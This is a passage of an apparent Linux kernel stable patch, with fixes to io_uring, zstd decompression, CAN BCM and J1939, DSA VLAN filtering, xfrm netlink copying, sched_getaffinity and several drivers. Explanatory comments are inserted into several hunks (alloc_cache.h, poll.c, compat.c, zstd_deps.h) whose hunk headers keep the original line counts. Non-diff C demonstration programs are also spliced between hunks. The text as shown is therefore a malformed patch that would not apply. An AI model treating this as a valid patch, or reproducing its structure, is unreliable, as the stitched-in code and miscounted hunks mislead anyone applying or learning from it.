++extern const struct file_operations zonefs_file_operations;
++int zonefs_file_truncate(struct inode *inode, loff_t isize);
++
++/* In sysfs.c */
+ int zonefs_sysfs_register(struct super_block *sb);
+ void zonefs_sysfs_unregister(struct super_block *sb);
+ int zonefs_sysfs_init(void);
+diff --git a/include/acpi/acpi_bus.h b/include/acpi/acpi_bus.h
+index 0584e9f6e3397..57acb895c0381 100644
+--- a/include/acpi/acpi_bus.h
++++ b/include/acpi/acpi_bus.h
+@@ -657,6 +657,7 @@ static inline bool acpi_quirk_skip_acpi_ac_and_battery(void)
+ #if IS_ENABLED(CONFIG_X86_ANDROID_TABLETS)
+ bool acpi_quirk_skip_i2c_client_enumeration(struct acpi_device *adev);
+ int acpi_quirk_skip_serdev_enumeration(struct device *controller_parent, bool *skip);
++bool acpi_quirk_skip_gpio_event_handlers(void);
+ #else
+ static inline bool acpi_quirk_skip_i2c_client_enumeration(struct acpi_device *adev)
+ {
+@@ -668,6 +669,10 @@ acpi_quirk_skip_serdev_enumeration(struct device *controller_parent, bool *skip)
+ 	*skip = false;
+ 	return 0;
+ }
++static inline bool acpi_quirk_skip_gpio_event_handlers(void)
++{
++	return false;
++}
+ #endif
+ 
+ #ifdef CONFIG_PM
+diff --git a/include/trace/events/rcu.h b/include/trace/events/rcu.h
+index 90b2fb0292cb1..012fa0d171b27 100644
+--- a/include/trace/events/rcu.h
++++ b/include/trace/events/rcu.h
+@@ -768,7 +768,7 @@ TRACE_EVENT_RCU(rcu_torture_read,
+ 	TP_ARGS(rcutorturename, rhp, secs, c_old, c),
+ 
+ 	TP_STRUCT__entry(
+-		__field(char, rcutorturename[RCUTORTURENAME_LEN])
++		__array(char, rcutorturename, RCUTORTURENAME_LEN)
+ 		__field(struct rcu_head *, rhp)
+ 		__field(unsigned long, secs)
+ 		__field(unsigned long, c_old)
+diff --git a/include/xen/interface/platform.h b/include/xen/interface/platform.h
+index 655d92e803e14..79a443c65ea93 100644
+--- a/include/xen/interface/platform.h
++++ b/include/xen/interface/platform.h
+@@ -483,6 +483,8 @@ struct xenpf_symdata {
+ };
+ DEFINE_GUEST_HANDLE_STRUCT(xenpf_symdata);
+ 
++#define XENPF_get_dom0_console 64
++
+ struct xen_platform_op {
+ 	uint32_t cmd;
+ 	uint32_t interface_version; /* XENPF_INTERFACE_VERSION */
+@@ -506,6 +508,7 @@ struct xen_platform_op {
+ 		struct xenpf_mem_hotadd        mem_add;
+ 		struct xenpf_core_parking      core_parking;
+ 		struct xenpf_symdata           symdata;
++		struct dom0_vga_console_info   dom0_console;
+ 		uint8_t                        pad[128];
+ 	} u;
+ };
+diff --git a/io_uring/alloc_cache.h b/io_uring/alloc_cache.h
+index 729793ae97127..c2cde88aeed53 100644
+--- a/io_uring/alloc_cache.h
++++ b/io_uring/alloc_cache.h
+@@ -27,6 +27,7 @@ static inline struct io_cache_entry *io_alloc_cache_get(struct io_alloc_cache *c
+ 		struct hlist_node *node = cache->list.first;
+ 
+ 		hlist_del(node);
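++		/* Keep nr_cached in sync with the list when taking an entry. */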
++		cache->nr_cached--;
+ 		return container_of(node, struct io_cache_entry, node);
+ 	}
+ 
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index fea739eef56f4..666666ab2e73d 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -724,6 +724,7 @@ int io_arm_poll_handler(struct io_kiocb *req, unsigned issue_flags)
+ 	apoll = io_req_alloc_apoll(req, issue_flags);
+ 	if (!apoll)
+ 		return IO_APOLL_ABORTED;
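++	/* Drop poll flags left over from any previous poll attempt. */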
++	req->flags &= ~(REQ_F_SINGLE_POLL | REQ_F_DOUBLE_POLL);
+ 	req->flags |= REQ_F_POLLED;
+ 	ipt.pt._qproc = io_async_queue_proc;
+ 
+diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
+index 2b8743645efcb..f27f4975217d9 100644
+--- a/io_uring/rsrc.h
++++ b/io_uring/rsrc.h
+@@ -144,15 +144,13 @@ static inline void io_req_set_rsrc_node(struct io_kiocb *req,
+ 					unsigned int issue_flags)
+ {
+ 	if (!req->rsrc_node) {
+-		req->rsrc_node = ctx->rsrc_node;
++		io_ring_submit_lock(ctx, issue_flags);
+ 
+-		if (!(issue_flags & IO_URING_F_UNLOCKED)) {
+-			lockdep_assert_held(&ctx->uring_lock);
++		lockdep_assert_held(&ctx->uring_lock);
+ 
+-			io_charge_rsrc_node(ctx);
+-		} else {
+-			percpu_ref_get(&req->rsrc_node->refs);
+-		}
++		req->rsrc_node = ctx->rsrc_node;
++		io_charge_rsrc_node(ctx);
++		io_ring_submit_unlock(ctx, issue_flags);
+ 	}
+ }
+ 
+diff --git a/kernel/compat.c b/kernel/compat.c
+index 55551989d9da5..fb50f29d9b361 100644
+--- a/kernel/compat.c
++++ b/kernel/compat.c
+@@ -152,7 +152,7 @@ COMPAT_SYSCALL_DEFINE3(sched_getaffinity, compat_pid_t,  pid, unsigned int, len,
+ 	if (len & (sizeof(compat_ulong_t)-1))
+ 		return -EINVAL;
+ 
+-	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
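++	/* Zero the cpumask so no uninitialized bytes are copied to user space. */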
++	if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	ret = sched_getaffinity(pid, mask);
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 9a0698353d60f..57d84b534cdea 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -8404,14 +8404,14 @@ SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
+ 	if (len & (sizeof(unsigned long)-1))
+ 		return -EINVAL;
+ 
+-	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	ret = sched_getaffinity(pid, mask);
+ 	if (ret == 0) {
+ 		unsigned int retlen = min(len, cpumask_size());
+ 
+-		if (copy_to_user(user_mask_ptr, mask, retlen))
++		if (copy_to_user(user_mask_ptr, cpumask_bits(mask), retlen))
+ 			ret = -EFAULT;
+ 		else
+ 			ret = retlen;
+diff --git a/kernel/trace/kprobe_event_gen_test.c b/kernel/trace/kprobe_event_gen_test.c
+index c736487fc0e48..e0c420eb0b2b4 100644
+--- a/kernel/trace/kprobe_event_gen_test.c
++++ b/kernel/trace/kprobe_event_gen_test.c
+@@ -146,7 +146,7 @@ static int __init test_gen_kprobe_cmd(void)
+ 	if (trace_event_file_is_valid(gen_kprobe_test))
+ 		gen_kprobe_test = NULL;
+ 	/* We got an error after creating the event, delete it */
+-	ret = kprobe_event_delete("gen_kprobe_test");
++	kprobe_event_delete("gen_kprobe_test");
+ 	goto out;
+ }
+ 
+@@ -211,7 +211,7 @@ static int __init test_gen_kretprobe_cmd(void)
+ 	if (trace_event_file_is_valid(gen_kretprobe_test))
+ 		gen_kretprobe_test = NULL;
+ 	/* We got an error after creating the event, delete it */
+-	ret = kprobe_event_delete("gen_kretprobe_test");
++	kprobe_event_delete("gen_kretprobe_test");
+ 	goto out;
+ }
+ 
+diff --git a/lib/zstd/common/zstd_deps.h b/lib/zstd/common/zstd_deps.h
+index 7a5bf44839c9c..f06df065dec01 100644
+--- a/lib/zstd/common/zstd_deps.h
++++ b/lib/zstd/common/zstd_deps.h
+@@ -84,7 +84,7 @@ static uint64_t ZSTD_div64(uint64_t dividend, uint32_t divisor) {
+ 
+ #include <linux/kernel.h>
+ 
+-#define assert(x) WARN_ON((x))
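++/* WARN_ON() fires when its condition is true, so assert() must negate it. */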
++#define assert(x) WARN_ON(!(x))
+ 
+ #endif /* ZSTD_DEPS_ASSERT */
+ #endif /* ZSTD_DEPS_NEED_ASSERT */
+diff --git a/lib/zstd/decompress/zstd_decompress.c b/lib/zstd/decompress/zstd_decompress.c
+index b9b935a9f5c0d..6b3177c947114 100644
+--- a/lib/zstd/decompress/zstd_decompress.c
++++ b/lib/zstd/decompress/zstd_decompress.c
+@@ -798,7 +798,7 @@ static size_t ZSTD_copyRawBlock(void* dst, size_t dstCapacity,
+         if (srcSize == 0) return 0;
+         RETURN_ERROR(dstBuffer_null, "");
+     }
+-    ZSTD_memcpy(dst, src, srcSize);
++    ZSTD_memmove(dst, src, srcSize);
+     return srcSize;
+ }
+ 
+@@ -858,6 +858,7 @@ static size_t ZSTD_decompressFrame(ZSTD_DCtx* dctx,
+ 
+     /* Loop on each block */
+     while (1) {
++        BYTE* oBlockEnd = oend;
+         size_t decodedSize;
+         blockProperties_t blockProperties;
+         size_t const cBlockSize = ZSTD_getcBlockSize(ip, remainingSrcSize, &blockProperties);
+@@ -867,16 +868,34 @@ static size_t ZSTD_decompressFrame(ZSTD_DCtx* dctx,
+         remainingSrcSize -= ZSTD_blockHeaderSize;
+         RETURN_ERROR_IF(cBlockSize > remainingSrcSize, srcSize_wrong, "");
+ 
++        if (ip >= op && ip < oBlockEnd) {
++            /* We are decompressing in-place. Limit the output pointer so that we
++             * don't overwrite the block that we are currently reading. This will
++             * fail decompression if the input & output pointers aren't spaced
++             * far enough apart.
++             *
++             * This is important to set, even when the pointers are far enough
++             * apart, because ZSTD_decompressBlock_internal() can decide to store
++             * literals in the output buffer, after the block it is decompressing.
++             * Since we don't want anything to overwrite our input, we have to tell
++             * ZSTD_decompressBlock_internal to never write past ip.
++             *
++             * See ZSTD_allocateLiteralsBuffer() for reference.
++             */
++            oBlockEnd = op + (ip - op);
++        }
++
+         switch(blockProperties.blockType)
+         {
+         case bt_compressed:
+-            decodedSize = ZSTD_decompressBlock_internal(dctx, op, (size_t)(oend-op), ip, cBlockSize, /* frame */ 1, not_streaming);
++            decodedSize = ZSTD_decompressBlock_internal(dctx, op, (size_t)(oBlockEnd-op), ip, cBlockSize, /* frame */ 1, not_streaming);
+             break;
+         case bt_raw :
++            /* Use oend instead of oBlockEnd because this function is safe to overlap. It uses memmove. */
+             decodedSize = ZSTD_copyRawBlock(op, (size_t)(oend-op), ip, cBlockSize);
+             break;
+         case bt_rle :
+-            decodedSize = ZSTD_setRleBlock(op, (size_t)(oend-op), *ip, blockProperties.origSize);
++            decodedSize = ZSTD_setRleBlock(op, (size_t)(oBlockEnd-op), *ip, blockProperties.origSize);
+             break;
+         case bt_reserved :
+         default:
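
The clamp itself is plain pointer arithmetic; a stand-alone sketch (variable names mirror the patch, but this is an illustration, not the real zstd API): with the compressed input placed inside the output buffer, the per-block write limit is pulled back to the read cursor so a block can never overwrite input it has not consumed yet.

#include <stdio.h>

int main(void)
{
	char buf[64];
	char *op = buf;		/* output write cursor */
	char *ip = buf + 16;	/* input read cursor (in-place decompression) */
	char *oend = buf + sizeof(buf);
	char *oBlockEnd = oend;

	if (ip >= op && ip < oBlockEnd)
		oBlockEnd = op + (ip - op);	/* == ip: stop before the input */

	printf("block may write %td of %td bytes\n", oBlockEnd - op, oend - op);
	return 0;
}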
+diff --git a/net/can/bcm.c b/net/can/bcm.c
+index 27706f6ace34a..a962ec2b8ba5b 100644
+--- a/net/can/bcm.c
++++ b/net/can/bcm.c
+@@ -941,6 +941,8 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 
+ 			cf = op->frames + op->cfsiz * i;
+ 			err = memcpy_from_msg((u8 *)cf, msg, op->cfsiz);
++			if (err < 0)
++				goto free_op;
+ 
+ 			if (op->flags & CAN_FD_FRAME) {
+ 				if (cf->len > 64)
+@@ -950,12 +952,8 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 					err = -EINVAL;
+ 			}
+ 
+-			if (err < 0) {
+-				if (op->frames != &op->sframe)
+-					kfree(op->frames);
+-				kfree(op);
+-				return err;
+-			}
++			if (err < 0)
++				goto free_op;
+ 
+ 			if (msg_head->flags & TX_CP_CAN_ID) {
+ 				/* copy can_id into frame */
+@@ -1026,6 +1024,12 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 		bcm_tx_start_timer(op);
+ 
+ 	return msg_head->nframes * op->cfsiz + MHSIZ;
++
++free_op:
++	if (op->frames != &op->sframe)
++		kfree(op->frames);
++	kfree(op);
++	return err;
+ }
+ 
+ /*
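
The refactor funnels every failure, including the previously unchecked memcpy_from_msg() result, through one free_op label that knows whether op->frames came from the heap. A stand-alone sketch of the shape, with illustrative names:

#include <stdlib.h>

struct op {
	void *frames;
	char sframe[16];	/* small inline buffer, like op->sframe */
};

static int tx_setup(struct op *op, size_t n)
{
	int err;

	op->frames = n <= sizeof(op->sframe) ? op->sframe : malloc(n);
	if (!op->frames)
		return -12;	/* -ENOMEM */

	err = n > 64 ? -22 : 0;	/* stand-in for a validation failure (-EINVAL) */
	if (err < 0)
		goto free_op;

	return 0;

free_op:
	if (op->frames != op->sframe)	/* only free what came from the heap */
		free(op->frames);
	return err;
}

int main(void)
{
	struct op op = { 0 };

	return tx_setup(&op, 128) == -22 ? 0 : 1;
}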
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index fce9b9ebf13f6..fb92c3609e172 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -1124,8 +1124,6 @@ static void __j1939_session_cancel(struct j1939_session *session,
+ 
+ 	if (session->sk)
+ 		j1939_sk_send_loop_abort(session->sk, session->err);
+-	else
+-		j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ }
+ 
+ static void j1939_session_cancel(struct j1939_session *session,
+@@ -1140,6 +1138,9 @@ static void j1939_session_cancel(struct j1939_session *session,
+ 	}
+ 
+ 	j1939_session_list_unlock(session->priv);
++
++	if (!session->sk)
++		j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ }
+ 
+ static enum hrtimer_restart j1939_tp_txtimer(struct hrtimer *hrtimer)
+@@ -1253,6 +1254,9 @@ static enum hrtimer_restart j1939_tp_rxtimer(struct hrtimer *hrtimer)
+ 			__j1939_session_cancel(session, J1939_XTP_ABORT_TIMEOUT);
+ 		}
+ 		j1939_session_list_unlock(session->priv);
++
++		if (!session->sk)
++			j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ 	}
+ 
+ 	j1939_session_put(session);
+diff --git a/net/dsa/slave.c b/net/dsa/slave.c
+index 6711ddc0a3c7d..df8b16c741a40 100644
+--- a/net/dsa/slave.c
++++ b/net/dsa/slave.c
+@@ -57,6 +57,12 @@ struct dsa_standalone_event_work {
+ 	u16 vid;
+ };
+ 
++struct dsa_host_vlan_rx_filtering_ctx {
++	struct net_device *dev;
++	const unsigned char *addr;
++	enum dsa_standalone_event event;
++};
++
+ static bool dsa_switch_supports_uc_filtering(struct dsa_switch *ds)
+ {
+ 	return ds->ops->port_fdb_add && ds->ops->port_fdb_del &&
+@@ -155,18 +161,37 @@ static int dsa_slave_schedule_standalone_work(struct net_device *dev,
+ 	return 0;
+ }
+ 
++static int dsa_slave_host_vlan_rx_filtering(struct net_device *vdev, int vid,
++					    void *arg)
++{
++	struct dsa_host_vlan_rx_filtering_ctx *ctx = arg;
++
++	return dsa_slave_schedule_standalone_work(ctx->dev, ctx->event,
++						  ctx->addr, vid);
++}
++
+ static int dsa_slave_sync_uc(struct net_device *dev,
+ 			     const unsigned char *addr)
+ {
+ 	struct net_device *master = dsa_slave_to_master(dev);
+ 	struct dsa_port *dp = dsa_slave_to_port(dev);
++	struct dsa_host_vlan_rx_filtering_ctx ctx = {
++		.dev = dev,
++		.addr = addr,
++		.event = DSA_UC_ADD,
++	};
++	int err;
+ 
+ 	dev_uc_add(master, addr);
+ 
+ 	if (!dsa_switch_supports_uc_filtering(dp->ds))
+ 		return 0;
+ 
+-	return dsa_slave_schedule_standalone_work(dev, DSA_UC_ADD, addr, 0);
++	err = dsa_slave_schedule_standalone_work(dev, DSA_UC_ADD, addr, 0);
++	if (err)
++		return err;
++
++	return vlan_for_each(dev, dsa_slave_host_vlan_rx_filtering, &ctx);
+ }
+ 
+ static int dsa_slave_unsync_uc(struct net_device *dev,
+@@ -174,13 +199,23 @@ static int dsa_slave_unsync_uc(struct net_device *dev,
+ {
+ 	struct net_device *master = dsa_slave_to_master(dev);
+ 	struct dsa_port *dp = dsa_slave_to_port(dev);
++	struct dsa_host_vlan_rx_filtering_ctx ctx = {
++		.dev = dev,
++		.addr = addr,
++		.event = DSA_UC_DEL,
++	};
++	int err;
+ 
+ 	dev_uc_del(master, addr);
+ 
+ 	if (!dsa_switch_supports_uc_filtering(dp->ds))
+ 		return 0;
+ 
+-	return dsa_slave_schedule_standalone_work(dev, DSA_UC_DEL, addr, 0);
++	err = dsa_slave_schedule_standalone_work(dev, DSA_UC_DEL, addr, 0);
++	if (err)
++		return err;
++
++	return vlan_for_each(dev, dsa_slave_host_vlan_rx_filtering, &ctx);
+ }
+ 
+ static int dsa_slave_sync_mc(struct net_device *dev,
+@@ -188,13 +223,23 @@ static int dsa_slave_sync_mc(struct net_device *dev,
+ {
+ 	struct net_device *master = dsa_slave_to_master(dev);
+ 	struct dsa_port *dp = dsa_slave_to_port(dev);
++	struct dsa_host_vlan_rx_filtering_ctx ctx = {
++		.dev = dev,
++		.addr = addr,
++		.event = DSA_MC_ADD,
++	};
++	int err;
+ 
+ 	dev_mc_add(master, addr);
+ 
+ 	if (!dsa_switch_supports_mc_filtering(dp->ds))
+ 		return 0;
+ 
+-	return dsa_slave_schedule_standalone_work(dev, DSA_MC_ADD, addr, 0);
++	err = dsa_slave_schedule_standalone_work(dev, DSA_MC_ADD, addr, 0);
++	if (err)
++		return err;
++
++	return vlan_for_each(dev, dsa_slave_host_vlan_rx_filtering, &ctx);
+ }
+ 
+ static int dsa_slave_unsync_mc(struct net_device *dev,
+@@ -202,13 +247,23 @@ static int dsa_slave_unsync_mc(struct net_device *dev,
+ {
+ 	struct net_device *master = dsa_slave_to_master(dev);
+ 	struct dsa_port *dp = dsa_slave_to_port(dev);
++	struct dsa_host_vlan_rx_filtering_ctx ctx = {
++		.dev = dev,
++		.addr = addr,
++		.event = DSA_MC_DEL,
++	};
++	int err;
+ 
+ 	dev_mc_del(master, addr);
+ 
+ 	if (!dsa_switch_supports_mc_filtering(dp->ds))
+ 		return 0;
+ 
+-	return dsa_slave_schedule_standalone_work(dev, DSA_MC_DEL, addr, 0);
++	err = dsa_slave_schedule_standalone_work(dev, DSA_MC_DEL, addr, 0);
++	if (err)
++		return err;
++
++	return vlan_for_each(dev, dsa_slave_host_vlan_rx_filtering, &ctx);
+ }
+ 
+ void dsa_slave_sync_ha(struct net_device *dev)
+@@ -1668,6 +1723,8 @@ static int dsa_slave_vlan_rx_add_vid(struct net_device *dev, __be16 proto,
+ 		.flags = 0,
+ 	};
+ 	struct netlink_ext_ack extack = {0};
++	struct dsa_switch *ds = dp->ds;
++	struct netdev_hw_addr *ha;
+ 	int ret;
+ 
+ 	/* User port... */
+@@ -1687,6 +1744,30 @@ static int dsa_slave_vlan_rx_add_vid(struct net_device *dev, __be16 proto,
+ 		return ret;
+ 	}
+ 
++	if (!dsa_switch_supports_uc_filtering(ds) &&
++	    !dsa_switch_supports_mc_filtering(ds))
++		return 0;
++
++	netif_addr_lock_bh(dev);
++
++	if (dsa_switch_supports_mc_filtering(ds)) {
++		netdev_for_each_synced_mc_addr(ha, dev) {
++			dsa_slave_schedule_standalone_work(dev, DSA_MC_ADD,
++							   ha->addr, vid);
++		}
++	}
++
++	if (dsa_switch_supports_uc_filtering(ds)) {
++		netdev_for_each_synced_uc_addr(ha, dev) {
++			dsa_slave_schedule_standalone_work(dev, DSA_UC_ADD,
++							   ha->addr, vid);
++		}
++	}
++
++	netif_addr_unlock_bh(dev);
++
++	dsa_flush_workqueue();
++
+ 	return 0;
+ }
+ 
+@@ -1699,13 +1780,43 @@ static int dsa_slave_vlan_rx_kill_vid(struct net_device *dev, __be16 proto,
+ 		/* This API only allows programming tagged, non-PVID VIDs */
+ 		.flags = 0,
+ 	};
++	struct dsa_switch *ds = dp->ds;
++	struct netdev_hw_addr *ha;
+ 	int err;
+ 
+ 	err = dsa_port_vlan_del(dp, &vlan);
+ 	if (err)
+ 		return err;
+ 
+-	return dsa_port_host_vlan_del(dp, &vlan);
++	err = dsa_port_host_vlan_del(dp, &vlan);
++	if (err)
++		return err;
++
++	if (!dsa_switch_supports_uc_filtering(ds) &&
++	    !dsa_switch_supports_mc_filtering(ds))
++		return 0;
++
++	netif_addr_lock_bh(dev);
++
++	if (dsa_switch_supports_mc_filtering(ds)) {
++		netdev_for_each_synced_mc_addr(ha, dev) {
++			dsa_slave_schedule_standalone_work(dev, DSA_MC_DEL,
++							   ha->addr, vid);
++		}
++	}
++
++	if (dsa_switch_supports_uc_filtering(ds)) {
++		netdev_for_each_synced_uc_addr(ha, dev) {
++			dsa_slave_schedule_standalone_work(dev, DSA_UC_DEL,
++							   ha->addr, vid);
++		}
++	}
++
++	netif_addr_unlock_bh(dev);
++
++	dsa_flush_workqueue();
++
++	return 0;
+ }
+ 
+ static int dsa_slave_restore_vlan(struct net_device *vdev, int vid, void *arg)
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index 00db74d96583d..b77f1189d19d1 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -415,7 +415,7 @@ void hsr_addr_subst_dest(struct hsr_node *node_src, struct sk_buff *skb,
+ 	node_dst = find_node_by_addr_A(&port->hsr->node_db,
+ 				       eth_hdr(skb)->h_dest);
+ 	if (!node_dst) {
+-		if (net_ratelimit())
++		if (port->hsr->prot_version != PRP_V1 && net_ratelimit())
+ 			netdev_err(skb->dev, "%s: Unknown node\n", __func__);
+ 		return;
+ 	}
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index d611e15301839..e24d2d5b04ad0 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -2576,6 +2576,17 @@ static int ieee80211_change_bss(struct wiphy *wiphy,
+ 	if (!sband)
+ 		return -EINVAL;
+ 
++	if (params->basic_rates) {
++		if (!ieee80211_parse_bitrates(link->conf->chandef.width,
++					      wiphy->bands[sband->band],
++					      params->basic_rates,
++					      params->basic_rates_len,
++					      &link->conf->basic_rates))
++			return -EINVAL;
++		changed |= BSS_CHANGED_BASIC_RATES;
++		ieee80211_check_rate_mask(link);
++	}
++
+ 	if (params->use_cts_prot >= 0) {
+ 		link->conf->use_cts_prot = params->use_cts_prot;
+ 		changed |= BSS_CHANGED_ERP_CTS_PROT;
+@@ -2597,16 +2608,6 @@ static int ieee80211_change_bss(struct wiphy *wiphy,
+ 		changed |= BSS_CHANGED_ERP_SLOT;
+ 	}
+ 
+-	if (params->basic_rates) {
+-		ieee80211_parse_bitrates(link->conf->chandef.width,
+-					 wiphy->bands[sband->band],
+-					 params->basic_rates,
+-					 params->basic_rates_len,
+-					 &link->conf->basic_rates);
+-		changed |= BSS_CHANGED_BASIC_RATES;
+-		ieee80211_check_rate_mask(link);
+-	}
+-
+ 	if (params->ap_isolate >= 0) {
+ 		if (params->ap_isolate)
+ 			sdata->flags |= IEEE80211_SDATA_DONT_BRIDGE_PACKETS;
+diff --git a/net/sunrpc/xprtsock.c b/net/sunrpc/xprtsock.c
+index aaa5b2741b79d..1b9465b43997c 100644
+--- a/net/sunrpc/xprtsock.c
++++ b/net/sunrpc/xprtsock.c
+@@ -2155,6 +2155,7 @@ static void xs_tcp_shutdown(struct rpc_xprt *xprt)
+ 	switch (skst) {
+ 	case TCP_FIN_WAIT1:
+ 	case TCP_FIN_WAIT2:
++	case TCP_LAST_ACK:
+ 		break;
+ 	case TCP_ESTABLISHED:
+ 	case TCP_CLOSE_WAIT:
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index cf5172d4ce68c..103af2b3e986f 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -1012,7 +1012,9 @@ static int copy_to_user_aead(struct xfrm_algo_aead *aead, struct sk_buff *skb)
+ 		return -EMSGSIZE;
+ 
+ 	ap = nla_data(nla);
+-	memcpy(ap, aead, sizeof(*aead));
++	strscpy_pad(ap->alg_name, aead->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = aead->alg_key_len;
++	ap->alg_icv_len = aead->alg_icv_len;
+ 
+ 	if (redact_secret && aead->alg_key_len)
+ 		memset(ap->alg_key, 0, (aead->alg_key_len + 7) / 8);
+@@ -1032,7 +1034,8 @@ static int copy_to_user_ealg(struct xfrm_algo *ealg, struct sk_buff *skb)
+ 		return -EMSGSIZE;
+ 
+ 	ap = nla_data(nla);
+-	memcpy(ap, ealg, sizeof(*ealg));
++	strscpy_pad(ap->alg_name, ealg->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = ealg->alg_key_len;
+ 
+ 	if (redact_secret && ealg->alg_key_len)
+ 		memset(ap->alg_key, 0, (ealg->alg_key_len + 7) / 8);
+@@ -1043,6 +1046,40 @@ static int copy_to_user_ealg(struct xfrm_algo *ealg, struct sk_buff *skb)
+ 	return 0;
+ }
+ 
++static int copy_to_user_calg(struct xfrm_algo *calg, struct sk_buff *skb)
++{
++	struct nlattr *nla = nla_reserve(skb, XFRMA_ALG_COMP, sizeof(*calg));
++	struct xfrm_algo *ap;
++
++	if (!nla)
++		return -EMSGSIZE;
++
++	ap = nla_data(nla);
++	strscpy_pad(ap->alg_name, calg->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = 0;
++
++	return 0;
++}
++
++static int copy_to_user_encap(struct xfrm_encap_tmpl *ep, struct sk_buff *skb)
++{
++	struct nlattr *nla = nla_reserve(skb, XFRMA_ENCAP, sizeof(*ep));
++	struct xfrm_encap_tmpl *uep;
++
++	if (!nla)
++		return -EMSGSIZE;
++
++	uep = nla_data(nla);
++	memset(uep, 0, sizeof(*uep));
++
++	uep->encap_type = ep->encap_type;
++	uep->encap_sport = ep->encap_sport;
++	uep->encap_dport = ep->encap_dport;
++	uep->encap_oa = ep->encap_oa;
++
++	return 0;
++}
++
+ static int xfrm_smark_put(struct sk_buff *skb, struct xfrm_mark *m)
+ {
+ 	int ret = 0;
+@@ -1098,12 +1135,12 @@ static int copy_to_user_state_extra(struct xfrm_state *x,
+ 			goto out;
+ 	}
+ 	if (x->calg) {
+-		ret = nla_put(skb, XFRMA_ALG_COMP, sizeof(*(x->calg)), x->calg);
++		ret = copy_to_user_calg(x->calg, skb);
+ 		if (ret)
+ 			goto out;
+ 	}
+ 	if (x->encap) {
+-		ret = nla_put(skb, XFRMA_ENCAP, sizeof(*x->encap), x->encap);
++		ret = copy_to_user_encap(x->encap, skb);
+ 		if (ret)
+ 			goto out;
+ 	}
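
All four helpers follow one rule: zero or field-copy the netlink payload instead of memcpy()ing a whole kernel struct, so stale padding and unused name-buffer bytes never reach user space. A user-space model of the difference (illustrative; strscpy_pad() has no libc equivalent, so a zeroed destination plus a bounded copy stands in):

#include <stdio.h>
#include <string.h>

struct algo {
	char name[8];
	unsigned int key_len;
};

int main(void)
{
	struct algo src, dst;
	const unsigned char *p = (const unsigned char *)&dst;

	memset(&src, 0xaa, sizeof(src));	/* stand-in for stale memory */
	memcpy(src.name, "aes", 4);		/* only 4 of 8 name bytes valid */
	src.key_len = 128;

	memset(&dst, 0, sizeof(dst));		/* zero the payload first */
	memcpy(dst.name, src.name, strnlen(src.name, sizeof(src.name) - 1));
	dst.key_len = src.key_len;

	printf("name tail byte: %#x (0, not 0xaa)\n", p[5]);
	return 0;
}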
+diff --git a/scripts/mod/modpost.c b/scripts/mod/modpost.c
+index efff8078e3958..9466b6a2abae4 100644
+--- a/scripts/mod/modpost.c
++++ b/scripts/mod/modpost.c
+@@ -1733,7 +1733,7 @@ static void extract_crcs_for_object(const char *object, struct module *mod)
+ 		if (!isdigit(*p))
+ 			continue;	/* skip this line */
+ 
+-		crc = strtol(p, &p, 0);
++		crc = strtoul(p, &p, 0);
+ 		if (*p != '\n')
+ 			continue;	/* skip this line */
+ 
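
The one-character change matters on 32-bit build hosts, where long is 32 bits: strtol() saturates any CRC at or above 0x80000000 to LONG_MAX, while strtoul() round-trips the full value. Quick stand-alone demonstration:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	const char *crc = "0xdeadbeef";

	/* with 32-bit long: 0x7fffffff (clamped) vs 0xdeadbeef (correct) */
	printf("strtol : %lx\n", strtol(crc, NULL, 0));
	printf("strtoul: %lx\n", strtoul(crc, NULL, 0));
	return 0;
}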
+diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c
+index 8b6aeb8a78f7d..02fd65993e7e5 100644
+--- a/sound/core/pcm_lib.c
++++ b/sound/core/pcm_lib.c
+@@ -2155,6 +2155,8 @@ int pcm_lib_apply_appl_ptr(struct snd_pcm_substream *substream,
+ 		ret = substream->ops->ack(substream);
+ 		if (ret < 0) {
+ 			runtime->control->appl_ptr = old_appl_ptr;
++			if (ret == -EPIPE)
++				__snd_pcm_xrun(substream);
+ 			return ret;
+ 		}
+ 	}
+diff --git a/sound/pci/asihpi/hpi6205.c b/sound/pci/asihpi/hpi6205.c
+index 27e11b5f70b97..c7d7eff86727f 100644
+--- a/sound/pci/asihpi/hpi6205.c
++++ b/sound/pci/asihpi/hpi6205.c
+@@ -430,7 +430,7 @@ void HPI_6205(struct hpi_message *phm, struct hpi_response *phr)
+ 		pao = hpi_find_adapter(phm->adapter_index);
+ 	} else {
+ 		/* subsys messages don't address an adapter */
+-		_HPI_6205(NULL, phm, phr);
++		phr->error = HPI_ERROR_INVALID_OBJ_INDEX;
+ 		return;
+ 	}
+ 
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index acde4cd58785e..099722ebaed83 100644
